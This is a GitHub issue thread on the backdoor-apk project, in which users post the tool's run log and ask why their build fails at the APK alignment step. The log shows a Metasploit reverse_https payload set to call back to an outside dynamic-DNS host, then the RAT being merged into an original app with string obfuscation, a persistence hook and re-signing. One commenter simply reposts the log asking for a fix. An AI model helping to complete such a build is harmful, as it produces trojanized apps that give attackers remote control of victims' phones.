### ISSUE TITLE
Problem with date and align

### ISSUE THREAD

**Issue by kitemmurt** [dana-at-cp/backdoor-apk#107]
[*] Running backdoor-apk.sh v0.2.2 on gio 11 mag 2017, 10.41.29, CEST
[+] Android payload options:

    meterpreter/reverse_http 4) shell/reverse_http
    meterpreter/reverse_https 5) shell/reverse_https
    meterpreter/reverse_tcp 6) shell/reverse_tcp
    [?] Please select an Android payload option: 3
    [?] Please enter an LHOST value: intelligenc100.ddns.net
    [?] Please enter an LPORT value: 1336
    [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
    [] Generating RAT APK file...done.
    [] Decompiling RAT APK file...done.
    [] Decompiling original APK file...done.
    [] Merging permissions of original and payload projects...done.
    [] Running proguard on RAT APK file...done.
    [] Decompiling obfuscated RAT APK file...done.
    [] Creating new directories in original project for RAT smali files...done.
    [] Copying RAT smali files to new directories in original project...done.
    [] Fixing RAT smali files...done.
    [] Obfuscating const-string values in RAT smali files...done.
    [] Locating smali file to hook in original project...done.
    [] Adding hook in original smali file...done.
    [] Adding persistence hook in original project...done.
    [] Recompiling original project with backdoor...done.
    date: data "Sat Feb 09 22:48:01 2041" non valida
    [] Generating RSA key for signing...done.
    [] Signing recompiled APK...done.
    [] Verifying signed artifacts...done.
    [] Aligning recompiled APK...done.
    [!] Failed to align recompiled APK

I ever have the problem with the date and align every apk i use and thi the log
Value of validity: -15994
Errore keytool: java.lang.Exception: La validità deve essere maggiore di zero
Retrying RSA key generation without original APK cert from date and validity values
jar signed.

Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-09-2) or after any future revocation date.

jar verified.

Warning:
This jar contains entries whose certificate chain is not validated.
This jar contains signatures that does not include a timestamp. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-09-2) or after any future revocation date.

Re-run with the -verbose and -certs options for more details.
./backdoor-apk.sh: riga 662: third-party/android-sdk-linux/build-tools/25.0.2/zipalign: cannot execute binary file: Formato eseguibile non valido
Forcing cleanup due to a failure or error state!

**Comment by dana-at-cp** [comment]
@kitemmurt Looks like your are running zipalign on a 64 bit system without 32 bit support.

**Comment by rocky2496** [comment]
[*] Running backdoor-apk.sh v0.2.2 on gio 11 mag 2017, 10.41.29, CEST
[+] Android payload options:

meterpreter/reverse_http 4) shell/reverse_http
meterpreter/reverse_https 5) shell/reverse_https
meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: intelligenc100.ddns.net
[?] Please enter an LPORT value: 1336
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Generating RAT APK file...done.
[] Decompiling RAT APK file...done.
[] Decompiling original APK file...done.
[] Merging permissions of original and payload projects...done.
[] Running proguard on RAT APK file...done.
[] Decompiling obfuscated RAT APK file...done.
[] Creating new directories in original project for RAT smali files...done.
[] Copying RAT smali files to new directories in original project...done.
[] Fixing RAT smali files...done.
[] Obfuscating const-string values in RAT smali files...done.
[] Locating smali file to hook in original project...done.
[] Adding hook in original smali file...done.
[] Adding persistence hook in original project...done.
[] Recompiling original project with backdoor...done.
date: data "Sat Feb 09 22:48:01 2041" non valida
[] Generating RSA key for signing...done.
[] Signing recompiled APK...done.
[] Verifying signed artifacts...done.
[] Aligning recompiled APK...done.
[!] Failed to align recompiled APK
I ever have the problem with the date and align every apk i use and thi the log
Value of validity: -15994
Errore keytool: java.lang.Exception: La validità deve essere maggiore di zero
Retrying RSA key generation without original APK cert from date and validity values
jar signed.

Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-09-2) or after any future revocation date.

jar verified.

Warning:
This jar contains entries whose certificate chain is not validated.
This jar contains signatures that does not include a timestamp. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-09-2) or after any future revocation date.

Re-run with the -verbose and -certs options for more details.
./backdoor-apk.sh: riga 662: third-party/android-sdk-linux/build-tools/25.0.2/zipalign: cannot execute binary file: Formato eseguibile non valido
Forcing cleanup due to a failure or error state!



please solve this problem
